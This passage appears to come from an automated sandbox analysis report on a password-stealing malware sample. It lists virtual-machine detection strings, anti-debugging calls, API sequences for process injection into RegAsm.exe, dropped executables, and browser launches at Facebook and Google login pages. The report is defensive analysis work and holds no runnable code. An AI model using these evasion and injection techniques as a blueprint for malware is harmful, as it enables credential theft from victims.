Source: firefox.exe, 00000031.00000002.4737168375.000002033A7FA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000031.00000003.2761334389.000002033A7FA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000031.00000003.2604866040.000002033A7FA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2672529573.000002650EEC0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: VBoxService.exe
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000003.2362295339.000000000193F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Hyper-VU
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: *Windows 10 Server Standard without Hyper-V
Source: Web Data.36.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
Source: Web Data.36.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: explorhe.exe, 0000002E.00000003.3962232462.000000000142D000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000002.4711406923.000000000142D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWE
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: VMWare
Source: Web Data.36.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: Web Data.36.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: Web Data.36.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	Thread information set: HideFromDebugger

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe

Code function: 16_2_0068EAA2 BlockInput,

16_2_0068EAA2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00500184 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

2_2_00500184

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0047BD40 SetUnhandledExceptionFilter,LoadLibraryA,LoadLibraryA,CreateThread,FindCloseChangeNotification,Sleep,GetTempPathA,CreateDirectoryA,CreateDirectoryA,Sleep,CreateDirectoryA,SetCurrentDirectoryA,CreateMutexA,GetLastError,Sleep,Sleep,Sleep,shutdown,closesocket,WSACleanup,Sleep,Sleep,Sleep,GetModuleHandleA,GetProcAddress,GetCurrentProcess,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,CloseHandle,DeleteFileA,Sleep,OutputDebugStringA,CreateMutexA,GetLastError,Sleep,Sleep,Sleep,shutdown,closesocket,Sleep,

2_2_0047BD40

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0044A530 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

2_2_0044A530

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0047BB80 mov eax, dword ptr fs:[00000030h]	2_2_0047BB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0047BB80 mov eax, dword ptr fs:[00000030h]	2_2_0047BB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0047BD40 mov eax, dword ptr fs:[00000030h]	2_2_0047BD40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0047BD40 mov eax, dword ptr fs:[00000030h]	2_2_0047BD40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0047BD40 mov eax, dword ptr fs:[00000030h]	2_2_0047BD40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0047BD40 mov ecx, dword ptr fs:[00000030h]	2_2_0047BD40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0047BD40 mov eax, dword ptr fs:[00000030h]	2_2_0047BD40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0047BD40 mov eax, dword ptr fs:[00000030h]	2_2_0047BD40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0047BD40 mov eax, dword ptr fs:[00000030h]	2_2_0047BD40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0047BD40 mov eax, dword ptr fs:[00000030h]	2_2_0047BD40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0047BD40 mov eax, dword ptr fs:[00000030h]	2_2_0047BD40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0047BD40 mov eax, dword ptr fs:[00000030h]	2_2_0047BD40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0047BD40 mov eax, dword ptr fs:[00000030h]	2_2_0047BD40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0047BD40 mov eax, dword ptr fs:[00000030h]	2_2_0047BD40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0047BD40 mov eax, dword ptr fs:[00000030h]	2_2_0047BD40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0047BD40 mov eax, dword ptr fs:[00000030h]	2_2_0047BD40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0047BD40 mov eax, dword ptr fs:[00000030h]	2_2_0047BD40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0047BD40 mov eax, dword ptr fs:[00000030h]	2_2_0047BD40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0047BD40 mov eax, dword ptr fs:[00000030h]	2_2_0047BD40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0047BD40 mov eax, dword ptr fs:[00000030h]	2_2_0047BD40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0047BD40 mov eax, dword ptr fs:[00000030h]	2_2_0047BD40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0047BD40 mov eax, dword ptr fs:[00000030h]	2_2_0047BD40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0047BD40 mov eax, dword ptr fs:[00000030h]	2_2_0047BD40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0047BD40 mov eax, dword ptr fs:[00000030h]	2_2_0047BD40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0047BD40 mov eax, dword ptr fs:[00000030h]	2_2_0047BD40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0047BD40 mov eax, dword ptr fs:[00000030h]	2_2_0047BD40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00426850 mov eax, dword ptr fs:[00000030h]	2_2_00426850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041AC60 mov eax, dword ptr fs:[00000030h]	2_2_0041AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041AC60 mov eax, dword ptr fs:[00000030h]	2_2_0041AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041AC60 mov eax, dword ptr fs:[00000030h]	2_2_0041AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041AC60 mov eax, dword ptr fs:[00000030h]	2_2_0041AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041AC60 mov eax, dword ptr fs:[00000030h]	2_2_0041AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041AC60 mov eax, dword ptr fs:[00000030h]	2_2_0041AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041AC60 mov eax, dword ptr fs:[00000030h]	2_2_0041AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041AC60 mov eax, dword ptr fs:[00000030h]	2_2_0041AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041AC60 mov eax, dword ptr fs:[00000030h]	2_2_0041AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041AC60 mov eax, dword ptr fs:[00000030h]	2_2_0041AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041AC60 mov eax, dword ptr fs:[00000030h]	2_2_0041AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041AC60 mov eax, dword ptr fs:[00000030h]	2_2_0041AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00419EC0 mov eax, dword ptr fs:[00000030h]	2_2_00419EC0
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_00634CE8 mov eax, dword ptr fs:[00000030h]	16_2_00634CE8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0049E4B0 CharNextA,CharNextA,CharNextA,CharNextA,lstrlenA,GetProcessHeap,GetProcessHeap,HeapAlloc,lstrcpynA,GetProcessHeap,HeapFree,

2_2_0049E4B0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0047BD40 SetUnhandledExceptionFilter,LoadLibraryA,LoadLibraryA,CreateThread,FindCloseChangeNotification,Sleep,GetTempPathA,CreateDirectoryA,CreateDirectoryA,Sleep,CreateDirectoryA,SetCurrentDirectoryA,CreateMutexA,GetLastError,Sleep,Sleep,Sleep,shutdown,closesocket,WSACleanup,Sleep,Sleep,Sleep,GetModuleHandleA,GetProcAddress,GetCurrentProcess,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,CloseHandle,DeleteFileA,Sleep,OutputDebugStringA,CreateMutexA,GetLastError,Sleep,Sleep,Sleep,shutdown,closesocket,Sleep,	2_2_0047BD40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00500184 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00500184
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004FB8A4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_004FB8A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004FBC4D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_004FBC4D
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_00642622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_00642622
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_0063083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_0063083F
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_006309D5 SetUnhandledExceptionFilter,	16_2_006309D5
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_00630C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_00630C21

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe

Code function: 0_2_033FA48D CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,

0_2_033FA48D

Contains functionality to inject threads in other processes

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00421C30 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject,

2_2_00421C30

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 52E000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 55A000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 55E000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 56A000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 11F2008	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe

16_2_00671201

Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe

Code function: 16_2_00652BA5 KiUserCallbackDispatcher,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

16_2_00652BA5

Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe

Code function: 16_2_0067B226 SendInput,keybd_event,

16_2_0067B226

Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe

Code function: 16_2_006922DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

16_2_006922DA

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe "C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe "C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	Process created: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe "C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.youtube.com/	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.facebook.com/login	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://accounts.google.com/	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.youtube.com	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.facebook.com/login	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://accounts.google.com	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.facebook.com/login	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/login	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe

Code function: 16_2_00670B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

16_2_00670B62

Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe

Code function: 16_2_00671663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

16_2_00671663

Source: 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000000.2300203640.00000000006D2000.00000002.00000001.01000000.0000000A.sdmp, 3kaNpKWTvXjwLZn_llOJ.exe.2.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 3kaNpKWTvXjwLZn_llOJ.exe	Binary or memory string: Shell_TrayWnd
Source: firefox.exe, 00000033.00000003.2989495444.0000026F5C26E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: hSoftware\Policies\Microsoft\Windows\PersonalizationNoChangingStartMenuBackgroundPersonalColors_BackgroundWilStaging_02RtlDisownModuleHeapAllocationRtlQueryFeatureConfigurationRtlRegisterFeatureConfigurationChangeNotificationRtlSubscribeWnfStateChangeNotificationRtlDllShutdownInProgressntdll.dllNtQueryWnfStateDataLocal\SM0:%d:%d:%hs_p0Local\SessionImmersiveColorPreferenceBEGINTHMthmfile\Sessions\%d\Windows\ThemeSectionMessageWindowendthemewndThemeApiConnectionRequest\ThemeApiPortwinsta0SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\PersonalizeAppsUseLightThemeSystemUsesLightThemedefaultshell\themes\uxtheme\render.cppCompositedWindow::WindowdeletedrcacheMDIClientSoftware\Microsoft\Windows\DWMColorPrevalenceSoftware\Microsoft\Windows\CurrentVersion\ImmersiveShellTabletModeMENUAccentColorSoftware\Microsoft\Windows\CurrentVersion\Explorer\AccentDefaultStartColorControl Panel\DesktopAutoColorizationAccentColorMenuStartColorMenuAutoColorSoftware\Microsoft\Windows\CurrentVersion\Themes\History\ColorsSoftware\Microsoft\Windows\CurrentVersion\Themes\HistoryAccentPaletteTab$Shell_TrayWndLocal\SessionImmersiveColorMutex

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_004FB4A3 cpuid

2_2_004FB4A3

